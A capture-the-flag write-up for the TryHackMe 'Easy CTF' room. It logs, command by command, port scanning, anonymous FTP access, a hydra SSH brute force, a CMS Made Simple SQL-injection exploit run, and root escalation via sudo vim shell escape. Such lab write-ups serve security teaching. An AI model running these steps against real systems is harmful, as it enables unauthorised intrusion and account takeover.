You can find the link here : https://tryhackme.com/room/easyctf

ctf
[aksheet@archlinux THM]$ nmap -sV -T4 IPStarting Nmap 7.91 ( https://nmap.org ) at 2021-08-04 16:46 UTC
Nmap scan report for IP
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds

FootHold Technique 1

Now it is the time for enumerating these services. First let us check out the FTP service which is running on port 21. (I like going enumerate the ports in order).

[aksheet@archlinux THM]$ ftp IPConnected to IP.
220 (vsFTPd 3.0.3)
Name (IP:aksheet): anonymous <- Enter this as the username
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp>
ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp>
ftp> get ForMitch.txt -
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
[aksheet@archlinux ~]$ hydra -l mitch -P rockyou.txt ssh://10.10.142.56:2222---
[DATA] attacking ssh://10.10.142.56:2222/
[2222][ssh] host: 10.10.142.56 login: mitch password: redacted
1 of 1 target successfully completed, 1 valid password found
---
[aksheet@archlinux ~]$ ssh mitch@IP -p2222 
The authenticity of host '[IP]:2222 ([IP]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[IP]:2222' (ED25519) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
$ whoami
mitch

FootHold Technique 2

Now enumerating the port 80.

[16:46:09] Starting: 
[16:46:36] 200 - 11KB - /index.html
[16:46:46] 200 - 929B - /robots.txt
[16:50:49] 301 - 315B - /simple -> http://IP/simple/
simple
2.2.8
cve
$ python2 ex.py -u http://IP/simple --crack -w ~/Desktop/rockyou.txt[+] Salt for password found: Redacted
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: Redacted
[+] Password cracked: Redacted
$ ftp IP                                                               
Connected to IP.
220 (vsFTPd 3.0.3)
Name (IP:kali): mitch
530 This FTP server is anonymous only.
Login failed.
$ ssh mitch@IP -p2222                                                     
Warning: Permanently added '[IP]:2222' (ECDSA) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$
$ pwd
/home/mitch
$ ls
user.txt
$ cat user.txt
Redacted
$ cd /home
$ ls
mitch sunbath

Path To Root

The first thing I do to check for privilege escalation is the sudo rights of the user. You can find out by doing the sudo -l command.

$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
$ sudo vim -c ':!/bin/sh'# whoami 
root
#
# cd /root
# ls
root.txt
# cat root.txt
Redacted

Hi, I’m Aksheet. Interested in Cyber Security and Aviation. eJPT certified on 9th March 2021.